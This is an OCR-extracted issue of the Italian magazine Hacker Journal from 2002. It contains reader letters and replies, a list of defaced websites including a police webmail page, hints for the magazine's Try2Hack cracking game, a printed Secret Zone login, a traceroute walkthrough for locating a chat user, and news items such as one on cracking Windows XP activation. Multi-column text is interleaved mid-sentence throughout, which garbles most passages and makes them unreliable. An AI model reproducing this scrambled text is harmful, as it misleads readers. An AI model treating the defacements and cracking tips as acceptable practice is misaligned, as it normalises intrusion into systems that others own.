Sei sulla pagina 1di 30

hack.

er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione
e come espandere le loro capacità, a differenza di molti utenti, che preferiscono
imparare solamente il minimo necessario.”

Quando avrete tra le mani questo numero di


Hacker Journal probabilmente starete per
passare il più lungo periodo dell'anno offline.
Oltre a mare, sole, cuore e amore, da qualche
anno per molte persone Agosto significa an-
Danni in rete Nuove vittime!
che (o soprattuto) niente computer e niente In-
ternet. Certo, qualcuno ha un portatile e la li-
nea telefonica anche nella casa delle vacan-
ze, ma non son mica poi tanti. Tranquilli, do-
po pochi giorni di crisi da astinenza, mare, so-
le, cuore e amore avranno la meglio, e non
sentirete più tanto la mancanza del fischio del
modem, del rilassante scorrere del mouse sul
tappetino e del luccichio del monitor negli oc-
chi. Se così non fosse, siete davvero malati.
Per i piccoli momenti di nostalgia da rete pe-
rò, portatevi in vacanza questa copia di Hac- FACED!
ker Journal, da gustare un po' alla volta, tra Server interno di Energy - http://asp.energy.it DE
un bagno e una piadina.

grand@hackerjournal.it

HJ: intasate le nostre caselle


Ormai sapete dove e come trovarci, appena
possiamo rispondiamo a tutti, anche a quelli
incazzati. Parola di hacker. SCRIVETE!!!

Anno 1 – N. 6 - 1 agosto/29 agosto 2002

Boss: theguilty@hackerjournal.it
Publisher: ilcoccia@hackerjournal.it
Editor: grAnd@hackerjournal.it,
FACED!
Technical editor: caruso_cavallo@hackerjournal.it
Graphic designer: Marco Ranieri Esperia.it - http://basilicata.esperia.it DE
Contributors: Daniele Festa (cover picture)

Publishing company
4ever S.r.l.
Via Torino, 51
20063 Cernusco sul Naviglio
Fax +39/02.92.43.22.35

Printing
Stige (Torino)
Distributore
Parrini & C. S.PA. - 00187 Roma - Piazza
Colonna, 361- Tel. 06.69514.1 r.a./20134
Milano, via Cavriana, 14
Tel. 02.75417.1 r.a.
Pubblicazione quattordicinale registrata
FACED!
al Tribunale di Milano il 25/03/02
con il numero 190. IT Business Weekly - www.itbussinessweeklt.it
DE
Direttore responsabile: Luca Sprea

Gli articoli contenuti in Hacker Journal


hanno uno scopo prettamente didattico
e divulgativo. L’editore declina ogni
responsabilità circa l’uso improprio
delle “tecniche” e dei tutorial
che vengono descritti al suo interno.

L’invio di immagini ne autorizza


implicitamente la pubblicazione gratuita
su qualsiasi pubblicazione anche non
della 4ever S.r.l.
Copyright 4ever S.r.l.
Testi, fotografie e disegni,
pubblicazione anche parziale vietata.
Realizzato con la collaborazione di FACED!
Hacker News Magazine - Groupe Hagal Aria polizia.it webmail - www.polizia.it
DE

2 | www.hackerjournal.it
Questo spazio è vostro!
Approfittatene, e fate lavorare quella tastiera!

o
r em vo
Sa uo la
n
di dico ì
e d
OPEN SOURCE in iove sto!
G go
°a
29
Poca coerenza?
Salve HJ, seramente. Cambiando pagina, nello più lettori e almeno non dovete far
OPEN SOUR
CE vi scrivo a proposito del- stesso numero, altra mail: “Nel pro- “finta” di voler promuovere lo spirito
la lettera da voi pubbli- fondo blu”. Viene evidenziato un pas- hacker, che a mio avviso continuate,
cata sul numero 5 dal saggio: “...pensano agli hacker come n o n s e m p r e m a s p e s s o , a d i n f a n g a-
titolo “La sicurezza, delinquenti, che loro usano queste sfi- re... se sulla pagina numero due di
una toppa alla volta”. de solo perché vogliono fare qualcosa ogni numero ci sono i siti defacciati,
Credo che, nello spiri- di diverso e per dimostrare al mondo come diavolo volete che la gente pen-
to hacker, tale lettera intero che niente è veramente sicuro si bene degli hacker???? Ma questi
sia un isulto alla filo- c o m e s i d i c e ” . I n p i e n a c o n t r a p p o s i- sono solo pensieri di un vecchio geek
sofia che accomuna “i zione con la mail della pagina prece- trentenne, capisco che la rivista non si
veri hacker”. Almeno si dente. Non mi sembra che HCS!elKapo rivolge a persone come me, infatti
contrappone alla filosofia abbia voluto dimostrare altro che il quando qualcuno mi chiede perché
degli hacker definita nel “jar- fatto di aver potuto inviare a “sbafo” compro la vostra rivista gli rispondo
gon file”, universalmente riconosciuta 50*10^3 (cito testualmente) messaggi “per combattere il nemico bisogna co-
come “bibbia degli hacker”. SMS, se questo non è delinquere... Al- noscerlo...”.
Se l’autore della mail pubblicata vuo- tra pagina... credo che sia ottima la E2ule5
le essere un hacker avrebbe dovuto risposta data nella mail “Ah, dottore
segnalare il buco ai webmaster o agli dottore”, in vero spirito hacker... ma, Come abbiamo già avuto modo di dire,
amministratori del sistema, questo se la pensate davvero così sul softwa- Hacker Journal ha aperto una finestra
sempre secondo il jargon file. Il fatto re come mai ci sono i link ad astalavi- di carta su un mondo, quello dell’hac-
di non averlo fatto e, anzi, averne ap- sta sull’aritcolo “Effetti speciali? Li king, che ha le sue contraddizioni e le
profittato inviando (secondo quello faccio io” pagina 26 numero 3, con un sue divisioni. È abbastanza normale
che scrive) 50.000 messaggi ne fa un paragrafo dal titolo “Se li volete gra- quindi che la rivista rifletta in parte
cracker e della peggiore specie. Se tuiti”? Un po’ di coerenza non farebbe tutto questo. Certo, una linea editoria-
tutti rispettassimo un po’ più le rego- male... sempre IMHO. Forse chi scrive le ce l’ha, ed è quella che puoi legge-
le, le aziende che mettevano a dispo- gli articoli e chi risponde alle mail la re nelle risposte e negli articoli. Per
sizione i servivi gratuiti, come gli SMS pensano in modo un po’ troppo diver- quanto riguarda le lettere, noi pubbli-
v i a i n t e r n e t , f o r s e a v r e b b e r o c o n t i- samente, credo dobbiate rivedere un chiamo quelle che stimolano riflessio-
nuato a farlo (anche se ne dubito... ma po’ la vostra linea etica, IMHO. Certo, ni, come quella del numero scorso che
questa è un’altra storia). se diventate una rivista per “hacker” ti ha tanto colpito. E pubblichiamo vo-
Ma non è per questo che vi scrivo, non così come indicato nel jargon file, lentieri la tua, sperando che faccia ri-
credo non ci sia nulla di male per una molti script kiddie, che tanto sono flettere qualcuno, che ci scriverà la
persona trovare una falla in qualche maltrattati a parole nella vostra rivi- sua interpretazione che genererà...
sito e approfittarne, vantandonese sta, ma tanto rifocillati da link utili da eccetera. Questa è una piazza dove si
con gli amici per fare il figo. Sempli- dove scaricare Warez e exploit, non fanno riflessioni pubbliche, dove le
cemente quella persona non è un hac- compreranno più la vostra rivista, for- p e r s o n e p o s s a n o f o r m a r s i u n ’ o p i n i o-
ker. Avreste, se vi ritenete una rivista zandovi a dover introdurre la pubbli- ne, cambiare punto di vista, e magari
per hacker, dovuto sottolinearlo, IM- cità (tanto odiata, anche se non capi- passare da una parte all’altra. Forse
HO naturalmente. Criticare pubblica- sco perché? tanto non credo che Mi- qualcuno che comincia con gli exploit
mente un sistema e non parlarne di- crosoft o Symantech vorrebbero fare si rende conto che non è poi ‘sta gran
rettamente con i responsabili non gio- la pubblicità sulla vostra rivista...). cosa, e gli viene voglia di diventare
va a nessuno, prima fra tutti alla co- Almeno però ci sarebbe un po’ più di un hacker vero. Se però etichettiamo
munità hacker che già gode di una coerenza tra quello che vi proponete subito buoni e cattivi, decidendo di
pessima reputazione nell’opinione di fare e cosa alla fine invece fate.In parlare solo ai primi, perdiamo tutti
pubblica. Se vi ritenete una rivista che ultima analisi, seguirei il consiglio questa possibilità.
vuole far conoscere al pubblico lo spi- datovi dalla lettrice Irene108 sempre ...Ah, secondo me HCS!elKapo stava
rito trainante degli hacker, con questa sul numero 5, cambiate il nome in un po’ esagerando quando parlava di
email avete, sempre IMHO, fallito mi- “cracker journal” credo avrete ancora 50*10^3 SMS.

UN GIORNALE PER TUTTI: SIETE NEWBIE O VERI HACKERS?


Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac-
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co-
mincia), MIDHACKING (per chi c’è già dentro) e HARDHACKING (per chi man-
gia pane e worm).

www.hackerjournal.it |3
www.hackerjournal.it

mailto:
redazione@hackerjournal.it

COMPILATORI GRATIS
ono un appassionato (inesperto)
S di programmazione Object Ori-
ented, e ho bisogno di un vostro
consiglio: mi sapreste indicare un
sito (sicuro) da cui scaricare gratui-
tamente un buon editor (provvisto
di compilatore) per il linguaggio
C/C++? Ve ne sarei infinitamente
grato! Tenete però presente che uti-
lizzo come SO Windows 98 e ME!
So che dovrei passare a Linux, ma
qui sorge un secondo problema: ho
appena installato su una partizione
del mio hard disk la distro 8.2 di
Mandrake, ma non appena questa
entra nella schermata iniziale il mio
(piuttosto vecchio) monitor viene Continuate a mandarci le vostre immagini: questa è di FXM (Gianni),
messo in stand-by! È possibile risol- che ha esagerato un po’, mandando un Tiff da 10 Mega. (Gianni, un
vere anche questo problema? Gra- Jpeg per questo tipo di cose va benissimo, e pesa mooolto meno).
zie!
Christi@n
a occhio sembrerebbe trattarsi di un parti più generali e discorsive, men-
Alcuni vecchi compilatori Borland problema di configurazione di tre metteremo sul sito gli esempi di
sono ora gratuiti! Non saranno i più XFree86, che probabilmente cerca codice, così si possono scaricare o
aggiornati, ma sono affidabili, do- di impostare una risoluzione o una copiare senza doverli trascrivere
cumentati e gratuiti. Li puoi trovare frequenza di refresh non supportate (con in più il rischio di errori).
all’indirizzo: dal monitor. Senza poterci mettere
http://community.borland.com/mu- le mani sopra, è è però difficile fare CANOTTIERE E CELLULARI
seum Per scaricarli è necessaria una diagnosi affidabili. Mi spiace, non alve ragazzi, vi scrivo questa e-
registrazione gratuita.
Per quanto riguarda il malfunziona-
riesco ad aiutarti di più. S mail per farvi una domanda e
una richiesta. Perché il pupazzo di-
mento del monitor con la Mandrake, SECRET ZONE PIÙ RICCA! segnato nella 4 copertina del gior-
iao sono dArKcLoWn, volevo nale ha il segno
CREW IN CERCA DI NUOVI MEMBRI C chiederevi di prendere almeno
in considerazione questa mia pro-
della abbronza-
tura della canot-
Salve, posta: perché non usate la secret tiera???Non è
vi abbiamo già scritto per farvi i zone come fonte principale dei no- che potete accen-
complimenti sul fatto che migliorate stri tanti richiesti corsi di linguaggi nare come trova-
in ogni nuovo numero, questa volta di programmazione E il giornale lo re la posizione di
per chiedervi di inserire l’indirizzo lasciamo com’è. Scommetto che i un cellulare? Vi
della Crew su HJ. lettori aumenteranno notevolmente. allego un teschio
Vi chiediamo di inserire il link perché ¥dArKcLoWn¥ in Ascii.
stiamo cercando nuovi membri e septar
nuovi collaboratori per completare Come forse avrei visto, la secret zo-
alcune sezioni del sito. ne del sito è sempre più ricca, e in Io quando non trovo la posizione
Il sito non è ancora on-line, ma cmq effetti già pensavamo di spostare lì del mio telefonino faccio così: col
l’indirizzo è www.epochcrew.cjb.net alcuni degli articoli che non trovano telefono di casa compongo il nume-
l’e-mail per chi volesse parteciapare posto nella rivista. Probabilmente ro del cellulare, e poi cerco di loca-
alla creazione del sito è per quanto riguarda la programma- lizzarlo seguendo la suoneria. Ge-
epochcrew@hotmail.com. zione, lasceremo sul giornale le neralmente lo trovo sotto ai cuscini

4 | www.hackerjournal.it
A
o STAMP
LIBERAITÀ
r em vo
Sa uo la
n
di dico ì C
e d
in iove sto!
G go
NO PINUFBOBRLMIAZIONI
°a SOLO ARTICOLI
29 E

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


del divano. O dentro a un calzino. deciso di lasciarlo a torso nudo, TOLLERANZA E PASSWORD
Ma forse non era questo che vole- ma non ci siamo accorti che il gra-
vi sapere... :-D fico aveva lasciato il computer “Ogni individuo, per quanto ti possa
Più seriamente, un cellulare può esposto al sole. Il giorno dopo, sembrare più scemo o più intelligen-
essere localizzato molto facilmen- quando la rivista era già in stam- te di te, più buono o più cattivo, più
te dal gestore e dalle forze di po- pa, sono comparsi i segni dell’ab- giusto o più ingiusto, più onesto o
lizia. Per un privato implica uno bronzatura. più bugiardo, più “antico” o più mo-
sforzo molto grande e l’utilizzo di Non ti preoccupare: se riguardi la derno, più ignorante o più colto e,
apparecchi e tecniche vietate. copertina verso ottobre, saranno perfino, identico a te, ha sempre
Per quanto riguarda la canottiera, probabilmente spariti. E per fortu- qualcosa di importante da comuni-
nei primi bozzetti il personaggio in na che qualche riga sopra avevo carti. Puoi condividerla o contestarla
effetti la indossava. Poi abbiamo scritto “scherzi a parte”. ma solo dopo averla ascoltato. Altri-

Try2Hack, fate vedere di che pasta siete fatti!


TRY2HACK:METTETE ALLA LIVELLO 4
PROVA LA VOSTRA ABILITÀ Non è difficile capire il linguaggio
con cui è realizzata la protezione del
A parole siete tutti bravi, ma riuscite ve- livello 4: Java. Da qualche parte nei
ramente a passare dei livelli di protezio- file temporanei dovreste quindi tro-
ne? Dimostratelo al mondo e a voi stessi vare un file che ha a che fare con
cercando di superare i dieci livelli di dif- l'applet in questione. Buon lavoro.
ficoltà del giochino Try2Hack (che si leg-
ge "try to hack"), presente sul nostro sito LIVELLO 5
www.hackerjournal.it. Il livello 5 funziona con un program-
Il gioco consiste nel superare i vari livel- ma scritto in Visual Basic. Le tracce e
li, inserendo ogni volta le password cor- gli indizi andranno trovati all'inter-
rette (oppure arrivando in altri modi alle no del programma, dopo averlo de-
pagine protette da password). compilato. Cercate la sezione relati-
Per farlo, potreste avere bisogno di alcu- va all'autenticazione e... lavorate di
ni programmi (Macromedia Flash, Softi- fantasia.
ce, VisualBasic).
Di tanto in tanto qualche lettore ci scrive LIVELLO 6
per dire che alcuni livelli sembrano non Anche il livello 6 utilizza un pro-
funzionanare. Noi vi possiamo assicura- gramma in Visual Basic, ma non è
re invece che tutti quanti funzionano possibile decompilarlo. Bisognerà
esattamente come dovrebbero. quindi cercare di intuire qualcosa
Chi ha orecchie per intendere... del suo funzionamento osservando
tutto quello che il programma fa al-
le nostre spalle (a quale server si
collega e cosa si dicono i due).
Nuova password!!!
Ecco i codici per accedere alla Secret Zone
del nostro sito, dove troverete informazioni
e strumenti interessanti. Con alcuni browser, gh Scores - High Scores - High Scores - Hig
potrebbe capitare di dover inserire due vol-
te gli stessi codici. Non fermatevi al primo
tentativo.
Mandateci una mail a: try2hack@hackerjournal.it
scrivendo il numero del livello a cui siete arrivati e le pas-
user: frast sword di tutti i livelli precedenti. Sui prossimi numeri pubbli-
cheremo l’elenco dei migliori.
pass: uoni9

www.hackerjournal.it |5
www.hackerjournal.it

menti, resta in silenzio!” È un mio giore di un semplice attacco, che tra


modo di pensare che stasera ho tra- l’altro sanno benissimo come contra-
dotto in parole per voi (la frase so- stare). Per quanto riguarda gli arre-
pra è mia, giuro!), riflettendo sui pro trati, puoi scaricarli dal sito in for-
e i contro delle critiche verso Hacker mato PDF. Da questo mese sono sta-
Journal che ho letto fin dai primi nu- ti spostati nella secret zone, alla
meri (ARGGGHH! mi sono perso il quale si accede con la password che
n.3 - colpa dell’uscita quindicinale). trovi sulla rivista.
Forse non condivido tutto quello che
fanno gli hackers (forse, perché de- Ghent e Fimietta propongono di sostituire la testa- VIRUS SU MAC
ta di Hacker Journal con questa immagine molto
vo capire ancora bene cosa vera- ari amici, volevo sottoporvi que-
mente fanno) però mi appassiona
l’idea di poter conoscere qualcuno
carina ma, secondo me, un po’ troppo complessa
come testata. Voi che ne pensate? C sto problema: Premetto che uso
Mac OS 9.0.4 e so che il virus di cui
nuovo, e ascoltare la cosa importan- non posso che farvi i complimenti!!! parlo non attacca questo sistema.
te che ha da proporre. Premetto che non sono un hacker (o, Penso di aver beccato un virus del
In bocca al lupo. almeno, vorrei averne le capacità e ceppo Klez perché sono soggetto a
P.S.: ma con sta password per acce- le conoscenze per esserlo... :P), ma quello che gli esperti chiamano
dere all’area segreta (ovvero di tutti ho iniziato ad interessarmi a questo spoofing (qualcuno o qualcosa sta
quelli che “accattano ‘o giurnale”) “mondo” già da parecchi anni. Ini- usando il mio indirizzo di posta elet-
quando ci azzeccate? Ho provato zialmente con profondo odio verso tronica per spedire e-mail a perso-
ma niente: fosse che fosse un po’ la categoria per diversi attacchi e vi- ne che non conosco e a cui non ho
sbagliata? (magari appositamente rus ricevuti nei primi anni di connes- spedito niente).
per creare un po’ di suspance???!!) sione in rete. Con il tempo ho capito Contemporaneamente ho tre proble-
E non scrivetemi che un hacker la che, certi attacchi devono essere di- mi sulla macchina:
password se la cerca da sola: se ero stinti tra idioti che non hanno niente 1 - non riesco più ad aprire i file jpg
già un hacker non mi compravo il da fare di meglio che incasinare la (messaggio :”non trovo un importa-
giornale per diventarlo (magari per vita in rete di semplici ed innocui tore grafico appropriato”) adopero
provarci). utenti e veri e propri professionisti
Have a nice night
Rafolino[RAF]
che hanno fatto delle loro conoscen-
ze, una vera e propria arte. Ho “tifa-
Arretrati
by

by
e to” gli attacchi contro siti pedofili, e abbonamenti
Per quanto riguarda la password, noi contro lo strapotere (ed anti-privacy)
l’abbiamo sempre azzeccata. A non della Microsoft, etc... Ora so distin- Siete in tanti a chiederci se sia possibile ab-
azzeccarla a volte sono stati i lettori, guere le categorie e comprendere bonarsi o richiedere i numeri arretrati di
che spesso e volentieri confondevano che gli idioti sono ovunque. E sono Hacker Journal, che ormai stanno diventan-
l (elle) con 1 (uno) o 0 (zero) con O felice che finalmente ci sia anche un do oggetti da collezione. Stiamo cercando di
(vocale o). Per tagliare la testa al to- posto per questi argomenti fra le allestire le strutture necessarie, ma potreb-
ro, abbiamo deciso di non utilizzare tante riviste in edicola. Mi chiedevo be essere necessario un po' di tempo. Intan-
più caratteri ambigui nello scegliere se fosse possibile reperire i primi 2 to, potete trovare i PDF di tutti i vecchi nu-
le nuove password. Precisiamo anco- numeri che mi sono sfuggiti, perchè meri sul sito nella Secret Zone, e già che sie-
ra una volta che, quando esce il nuo- ho deciso di diventare un vostro let- te sul sito, iscrivetevi alla nostra mailing list:
vo numero della rivista, le password tore abituale. sarete avvisati non appena i servizi abbo-
associate al vecchio numero cessano Francesco “Squalo” namenti e arretrati saranno disponibili.
di funzionare.
Tieni comunque presente che attac-
LA MADRE DEI LAMER È care il server di un altro è un reato,
SEMPRE INCINTA anche se questo è “cattivo”. E per di
i presento: mi chiamo Francesco più spesso non serve a niente. Se in-
M “Squalo”, ho 27 anni e vivo a
Latina. Oggi, in una sperduta edico-
vece di attaccare frontalmente e bru-
talmente i server Web di Microsoft la
la della mia città, ho trovato il n.3 gente si impegnasse a dimostrarne
della vs rivista. Inizialmente ho pen- teoricamente le vulnerabilità e a pro-
sato ad un nome ingannevole ma, pagandare le soluzioni alternative
sfogliandola, ho scoperto che il no- (software libero sopra tutte), il dan-
me era coerente con il contenuto. E no per Microsoft sarebbe molto mag-

6 | www.hackerjournal.it
A
STAMP
r
o
em vo
Sa uo la
LIBERAITÀ
C
n
di dico ì
e d
NOOPINUFBOBRLMIAZIONI
in iove sto! L
SO L OLI
G go E ARTIC
°a
29

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


Adobe Photoshop. gramma che usi per i filmati. Se inve- utenti degli indirizzi tipo: lineamo-
2 - sono spariti tutti i preferiti dal ce vuoi farne un Video CD, che può dem56-padova.dialup.provider.it
Browser (MS Explorer 5 + Outlook essere visualizzato anche su un tele- Anche senza un indirizzo “eloquen-
Express 5.0.1) visore con un lettore di DVD, le cose te” come questo, avendo l’indirizzo
3 - quando apro il centro aiuti del si complicano un po’. I Video-CD in- IP dell’utente è possibile effettuare
Mac il testo è sparito , compare so- fatti non possono contenere file co- un traceroute e vedere se i nomi dei
lo questa scritta “run in Dos mode dificati con Div-X, ma devono essere router intermedi rivelano qualcosa.
$PELLoo1E7#......”. di tipo Mpeg-1, con impostazioni Per esempio, si può ottenere qualco-
Sulla macchina ho anche Virtual PC particolari. Trovi tutte le informazio- sa di questo tipo (abbiamo tagliato i
2.0.1. Cosa ne pensate? ni per creare Video CD con Easy CD tempi di risposta dal traceroute ed
Ragy Creator partendo da file Avi o Quick- eliminato le prime e le ultime righe
Time sul sito www.roxio.com/en/sup- per riservatezza...):
Klez non attacca i Macintosh, ma è port /roxio_support/ecdc/video_im-
dannoso anche per gli utenti della pression.html 2 host149-10.pool217141.interbusiness.it
mela. La vera vittima del virus è pro- 3 r-mi225-vl10.opb.interbusiness.it
babilmente un tuo amico o cono- CHAT E PARANOIA 4 r-mi225-mi258.opb.interbusiness.it
scente che usa Outlook per Windows i chiedo un aiuto, spero di riceve- 5 r-rm258-mi213.opb.interbusiness.it
e ha il tuo nome nella rubrica dei
contatti. Klez infatti prende a caso
V re una vostra email al + presto:
alcune sere fa stavo chattando in
6 r-rm213-fi63.opb.interbusiness.it
7 r-fi63-fi67.opb.interbusiness.it
indirizzi dalla rubrica della vittima e www.actionchat.com e, mentre par- 8 r-fi41-vl19.opb.interbusiness.it
li usa come “mittente” delle email lavo, la persona dall’altra parte è ri- 9 host198-238.pool21759.interbusiness.it
con le quali si propaga (per farlo uscita a risalire al mio ip e quindi mi 10 gw1-hssi0.dada.it
non servono tecniche particolari, e ha detto anche la città da dove chat-
parlare di spoofing è quanto meno tavo. Inoltre mi ha spiegato che Si può vedere che la connessione
esagerato). Gli altri problemi che ci- avrebbe potuto anche venire a cono- parte da un nodo di Milano (riga 3,
ti sono però effettivamente sospetti. scenza del mio indirizzo e del nume- r-mi225-vl10...), si sposta su Roma
Soprattutto quello relativo al Centro ro di telefono. È possibile tutto ciò? (riga 5, rm258-mi213...) per poi ter-
Aiuti. Anche se i virus Mac sono mol- devo temere qualcosa? Come ha minare dalle parti di Firenze (dalla
to rari, mi procurerei un buon antivi- fatto a sapere il mio ip e la mia riga 7 in poi, r-fi63-fi67...)
rus aggiornato e farei una bella città? Navigo con prima di arrivare al provider
scansione! un provider tipo li- a cui è collegato l’utente
bero o altro quindi (dada.it). Si può dedurre
DVD SU CD: COME? con ip dinamico, quindi che l’utente è colle-
opo aver acquistato il n°4 del cosa altro devo te- gato a un nodo Dada di Fi-
D giornale, ho provato ha fare la
conversione del DVD. Ho fatto tutte
mere? Scusate la
mia ignoranza e
renze.
Ancora più facilmente, il
le operazione spiegate sul giornale preoccupazione, ma tutto può essere fatto usan-
e ho finito la conversione dopo 1ora non vorrei avere do un’utility grafica come
e 44 minuti. Dopo aver aperto il fi- sgradite sorprese... Visual Route (www.visual-
le convertito, si apre Windows Me- In definitiva: è possi- route.com) o Neo Trace (www.mca-
dia Player e vedo il film. Io vorrei bile scoprire tutte queste cose di un fee.com/myapps/neoworx), che mo-
tanto sapere (e spero che lo spie- partecipante a una chat? E se si, co- strano su una cartina geografica il
gherete sul pross. num.) come fac- me si fa? percorso della connessione. Con
cio con il programma di masterizza- Giovanni questi dati è possibile ottenere ulte-
zione che ho (Easy cd creator) a riori informazioni (indirizzo e numero
metterlo sul CD-R? Può sembrare Risalire al numero IP di un parteci- di telefono), ma solo se si ha acces-
una domanda stupida ma mi serve pante a una chat è in genere molto so ai dati riservati del provider.
un aiuto!!!! GRAZIE semplice, anche se varia in base al Quest’ultimo è tenuto a custodire
Shaddix86 sistema di chat utilizzato (Irc, Icq, dati di questo tipo con molte atten-
chat in Java sui siti Web...). Molti zioni, e li comunica solo alle forze di
Se vuoi semplicemente rivederlo sul provider poi, e particolarmente quel- polizia dopo l’autorizzazione del
PC, basta che copi il file sul CD co- li più grandi, hanno un sistema di in- Giudice per le Indagini Preliminari.
me se si trattasse di un documento dirizzi che rivela parecchie informa- Sostanzialmente, secondo me il tuo
qualsiasi. Quando vorrai rivederlo, zioni della persona che si collega. Li- amico era un lamerone che le spara-
basterà aprire quel file con il pro- bero per esempio assegna ai propri va un po’ grosse.

www.hackerjournal.it |7
news
HOT! ! APPLE TRA APPLAUSI E FISCHI

139 euro più Iva come


tutti gli altri. La seconda
nota negativa è
l’annuncio che i servizi
iTools finora gratuiti
(posta elettronica con
indirizzo @mac.com,
spazio per home page e
pubblicazione di foto
online e un disco
virtuale da 25 Mbyte),
da ora in poi saranno
solo a pagamento. A
fronte di un aumento
delle caratteristiche del
! USA: ERGASTOLO servizio (100 Mbyte di
PER I CRACKER spazio per sito e disco
invece di 25, 15 Mbyte
l primo ramo del parlamento americano ha invece di 5 per la posta,
I approvato la legge Cyber Security Enhan- e l’inclusione nel
cement Act (CSEA), che inasprisce le pene urante il Macworld Expo di New York, il CEO pacchetto di software antivirus e di backup),
per i reati di tipo informatico e permette alle D di Apple Steve Jobs ha fatto il tradizionale gli utenti dovranno sborsare poco meno di 100
forze di polizia di realizzare intercettazioni In- bagno di folla. Questa volta però, accanto alle dollari l’anno. Anche se non si tratta del primo
ternet o telefoniche senza bisogno di auto- acclamazioni, qualcuno degli utenti più fedeli è servizio gratuito che diventa a pagamento, gli
rizzazioni da parte del tribunale. rimasto parecchio scontento da alcune delle no- utenti sono particolarmente arrabbiati perché,
L’incredibile provvedimento era già stato vità. Tra le notizie positive c’è stato senz’altro quando Steve Jobs ha annunciato iTools per la
preparato prima dell’11 settembre, ma fino Mac OS X 10.2 (noto come Jaguar), aggiorna- prima volta, aveva parlato di “indirizzo email a
al giorno degli attacchi terroristici di New mento che migliora grandemente le funzionalità vita”, e questa affermazione era stata anche
York e Washington aveva parecchi avversa- del sistema, il nuovo lettore di Mp3 iPod da 20 utilizzata come arma pubblicitaria.
ri, primi tra tutti i deputati più sensibili verso Gbyte, gli iMac con schermo Lcd da 17” e una Al solito, accanto a chi sa solo lamentarsi c’è
i temi legati alla privacy e ai diritti civili. Ora nuova serie di applicazioni gratuite che permet- anche chi si organizza per superare le
invece la legge è passata con una maggio- teranno di centralizzare la gestione di contatti e difficoltà, magari sfruttando le potenzialità di
ranza schiacciante (385 voti a favore e solo appuntamenti, permettendo una facile sincroniz- Internet. Lo staff del Powerbook Owners Club
3 contrari). Il CSEA permetterà ai tribunali zazione con palmari e cellulari. (www.poc.it) ha deciso di offrire
persino di infliggere la pena dell’ergastolo a Due notizie hanno però deluso gli appassionati. gratuitamente a tutti i suoi soci un indirizzo di
quei cracker che, con le loro azioni, mette- La prima novità è che per l’acquisto di Jaguar posta con suffisso @poc.it, e hosting sul sito
ranno in pericolo la vita di altre persone. Le non ci sarà nessuna versione “aggiornamento”, del club, con caratteristiche diverse a seconda
intercettazioni potranno essere effettuate gli attuali utenti di Mac OS X dovranno pagare del tipo di socio (ordinario o sostenitore). K
senza autorizzazione per motivi di urgenza
(per esempio durante un attacco) o di estre-
ma gravità (casi di sicurezza nazionale o ri- ! METTIAMOCI UNA FIRMA
schio per l’incolumità delle persone), ma do-
vranno essere limitate all’ottenimento delle
coordinate della persona sorvegliata (indiriz- &A, azienda con sede a Milano, ha annunciato il lancio di
zo IP, email o numero di telefono); senza au- C SignStation: un software per Windows accenntra le opera-
torizzazione non sarà possibile controllare il zioni relative alla firma digitale e crittografia per tutti i formati di
contenuto di telefonate e connessioni Inter- file nel rispetto della legge italiana. SignStation gestisce firme
net. Una curiosità: tra le altre cose previste multiple mantenendo traccia dei firmatari e della marcatura tem-
dalla legge, diventerà vietato pubblicizzare porale delle firme. Questo permette di tenere una traccia certifi-
on-line qualsiasi “apprecchio eletronico di cata delle modifiche a un file. Applicando la crittografia multipla
sorveglianza” (il divieto era finora relativo è possibile cifrare un documento per condividerlo con un speci-
solo alla pubblicità stampata su carta). Pro- fico gruppo di persone in un unico passaggio. SignStation e già
babilmente il governo americano è convinto disponibile e lo si può scaricare da Internet direttamente dal si-
che Bin Laden si procuri i propri strumenti to della C&A (www.com-and.com). K
on-line, pagando con carta di credito e fa-
cendosi recapitare il tutto a casa! Se non al- “IN MEDIA STAT VIRUS”
tro sarà la fine dei noiosissimi pop-up del- > anonimo bulgaro?
la telecamerina X-11... K

8 | www.hackerjournal.it
news

! E’ POSSIBILE INFETTARE 3 MILIONI DI SERVER


IN 30 SECONDI! HOT!
quanto affermano degli analisti del set- MP3 SU PS2
È tore nel documento “How to 0wn the In- u psxforum.com è
ternet in Your Spare Time” rintracciabile in Spossibile scarica-
versione integrale all’indirizzo: www.icir. re un nuovo player
org/vern/papers/cdc-usenix- di mp3 prodotto da
sec02/index.html. Tali studiosi affemano Paradox per PS2. Il
appunto che adottando nuove tecniche di player ancora in fa-
infezione e diffusione è possibile infettare se beta, frutto di
anche 3 milioni di server in mezzo minuto. un accordo tra
Che ciò fosse realmente possibile è intuibi- Paradox e Sony,
le come, con tecniche adeguate, sia possi- sembrerebbe già
bile diffondere dei virus a livello mondiale funzionare in
in pochissimi minuti. K modo egregio.
Ulteriori infor-
mazioni sono
rintracciabili
! MICROSOFT BLINDA WINDOWS XP nel sito web
di Psxforum. K

I (il famigerato Service Pack 1) conterrà


l nuovo aggiornamento di Windows XP sione delle dll e, se
trovasse qualcosa “HOW TO BECOME A
una patch che renderà molto più difficile che non va, impedirà
craccare il sistema operativo copiando di effettuare l'aggior- HACKER” IN ITALIANO
er quanti sono interessati a diventare hac-
P ker un testo da non perdere è il documen-
alcune dll della versione venduta alle namento (ma non di
azienda (che non prevede l'uso del mec- continuare a usare il
canismo di attivazione basato su doppia prodotto craccato). Ancora non si sa per to “‘How To Become A Hacker” di Eric S. Ray-
chiave). Finora era infatti abbastanza fa- certo se Microsoft implementerà ulterio- mond tradotto in italiano da Andrea Ferrares-
cile copiare le dll della versione "sprotet- ri meccanismi di autodifesa, come per so di Programmazione.it. Il testo, tradotto or-
ta" e utilizzare così la versione per uten- esempio un controllo della chiave di atti- mai da qualche mese è possibile rintracciarlo
ti finali senza dover attivare la propria vazione, allo scopo di verificare che non all’indirizzo http://www.programmazione.it/in-
copia sui server Microsoft. Il SP1 invece sia tra quelle circolate abbondantemen- dex.php?entity=earticle&idArticle=666&ida-
verificherà l'integrità e il numero di ver- te su Internet. K rea=28
Per chi invece preferisse leggerlo nella sua
versione originale, l’indirizzo è
! SCHERZI DA HACKER CON PC SMILE! http://www.tuxedo.org/~esr/faqs/hacker-
howto.html K

I le colleghe a vedere divertenti giochini


l vostro vicino di scrivania invita tutte vignette umoristiche da utilizzare come

o salvaschermo insoliti e voi sotto sotto


sfondo del desktop o da inviare agli
